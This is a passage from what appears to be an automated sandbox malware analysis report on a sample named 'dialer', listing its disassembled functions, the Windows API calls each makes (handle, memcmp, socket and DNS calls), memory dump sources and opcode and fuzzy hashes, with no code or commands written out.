                                                                                      • CloseHandle.KERNEL32(00000000,?,05948E0E,00000000,0594BB73,0594BBBA,0596EEE0,0594BBC2,0594BB73,00000000), ref: 05948E4D
                                                                                      • WaitForSingleObject.KERNEL32(0594BB73,000000FF,?,05948E0E,00000000,0594BB73,0594BBBA,0596EEE0,0594BBC2,0594BB73,00000000), ref: 05948E58
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$CloseCompareCreateExchangeHandleInterlockedObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 4206309166-0
                                                                                      • Opcode ID: 4c7961b6ef31e27946f22c6b7ffc61dbf8c6c0d69051630bd37ab3ac4a532eb6
                                                                                      • Instruction ID: 222fab7c48afef5cf66a6bab8aba3fbb7b2f29a7a85d004c8b1af6ddf47da453
                                                                                      • Opcode Fuzzy Hash: 4c7961b6ef31e27946f22c6b7ffc61dbf8c6c0d69051630bd37ab3ac4a532eb6
                                                                                      • Instruction Fuzzy Hash: B9F08235118304FBDB102FA0DC4AF963FACEB097A1F108519FA0AA61C0DB7194448B60
                                                                                      Function 059450CC Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,0596DD30,0000000E), ref: 059450F7
                                                                                      • memcmp.MSVCRT(?,0596DD20,0000000E), ref: 05945119
                                                                                      • memcmp.MSVCRT(?,0596DD10,0000000E), ref: 0594513B
                                                                                      • memcmp.MSVCRT(?,0596DD00,0000000E), ref: 0594515D
                                                                                      • memcmp.MSVCRT(?,0596DCF0,0000000E), ref: 0594517F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1475443563-0
                                                                                      • Opcode ID: dc2255c346a6b039bd3446feefa026f886b1d77b687a2ce6273c5ddda79d5585
                                                                                      • Instruction ID: e2c8a56f3b0e60ada8df691c94cb99d6f63727e2dfa038d61b956594d8033999
                                                                                      • Opcode Fuzzy Hash: dc2255c346a6b039bd3446feefa026f886b1d77b687a2ce6273c5ddda79d5585
                                                                                      • Instruction Fuzzy Hash: 1F01DFB175834533E43022FB1E27F35264AA78198AF461C10BD19EC58AF5A6DC089E42
                                                                                      Function 05945199 Relevance: 6.3, APIs: 5, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,0596DCE0,0000000F), ref: 059451BA
                                                                                      • memcmp.MSVCRT(?,0596DCD0,0000000F), ref: 059451D8
                                                                                      • memcmp.MSVCRT(?,0596DCC0,0000000F), ref: 059451FA
                                                                                      • memcmp.MSVCRT(?,0596DCB0,0000000F), ref: 0594521C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1475443563-0
                                                                                      • Opcode ID: 99f8f6159aa0700d73901cdad9a27d5daed96f6fc51988955ec828d415c86662
                                                                                      • Instruction ID: 2d8876f13e6b0570dbfae9bc1f20d10497bc9456c8aea3c5594f0ea39f657f74
                                                                                      • Opcode Fuzzy Hash: 99f8f6159aa0700d73901cdad9a27d5daed96f6fc51988955ec828d415c86662
                                                                                      • Instruction Fuzzy Hash: DA01A2B274470533D52011F71E17F3A2689AB41946F855421FD18EC94EF298ED0C6987
                                                                                      Function 0594E0E5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: callocfree
                                                                                      • String ID: P
                                                                                      • API String ID: 306872129-3110715001
                                                                                      • Opcode ID: 26d43a67309fdc25d9986cae966f40e20bac741d9a31882e4f4773a45b976b48
                                                                                      • Instruction ID: d0d530c2b5795c2b4ab6145b1fc4b09d6e15a41c5102e4eb9675488d6643d826
                                                                                      • Opcode Fuzzy Hash: 26d43a67309fdc25d9986cae966f40e20bac741d9a31882e4f4773a45b976b48
                                                                                      • Instruction Fuzzy Hash: 9F511431309604AFD765DB28C949F2A7BDEBF85700F588998F4468F292E721ED44CF46
                                                                                      Function 059439C1 Relevance: 6.1, APIs: 4, Instructions: 89networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddrFreeInfogetaddrinfohtonsmemset
                                                                                      • String ID:
                                                                                      • API String ID: 928751204-0
                                                                                      • Opcode ID: 167dc5eeaa0ebaed05b9d036d900a7f7f657a70596444a004b9bf9fe38c00f24
                                                                                      • Instruction ID: a84b8dc6fc1b30fdae4100f290a2c7cd1c8835cc280dc0926d5783c7bc2793b1
                                                                                      • Opcode Fuzzy Hash: 167dc5eeaa0ebaed05b9d036d900a7f7f657a70596444a004b9bf9fe38c00f24
                                                                                      • Instruction Fuzzy Hash: AA318D71A54205EFCB24DFA4C888EAEBBBAFF48314F144959E415A7111E371EE89CF90
                                                                                      Function 0594A53B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSARecv.WS2_32(?,?,00000001,00000000,?,00000000,00000000), ref: 0594A641
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 0594A6F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Offset: 05941000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_5941000_dialer.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastRecv
                                                                                      • String ID: E'
                                                                                      • API String ID: 904507345-3751625834
                                                                                      • Opcode ID: 13a8e301f15af3907d4afb6b7234817a17995f1caa3d3a98c7c9689a61f3f8ec
                                                                                      • Instruction ID: 044976b314fd23ae5a5ef03ff43f711abfd14eb99d838ed41efd65ae58166c80
                                                                                      • Opcode Fuzzy Hash: 13a8e301f15af3907d4afb6b7234817a17995f1caa3d3a98c7c9689a61f3f8ec
                                                                                      • Instruction Fuzzy Hash: 1D819E70984704AFDB319F14C884EAA77FBFF05364F044A1DE95686690E731EE858F90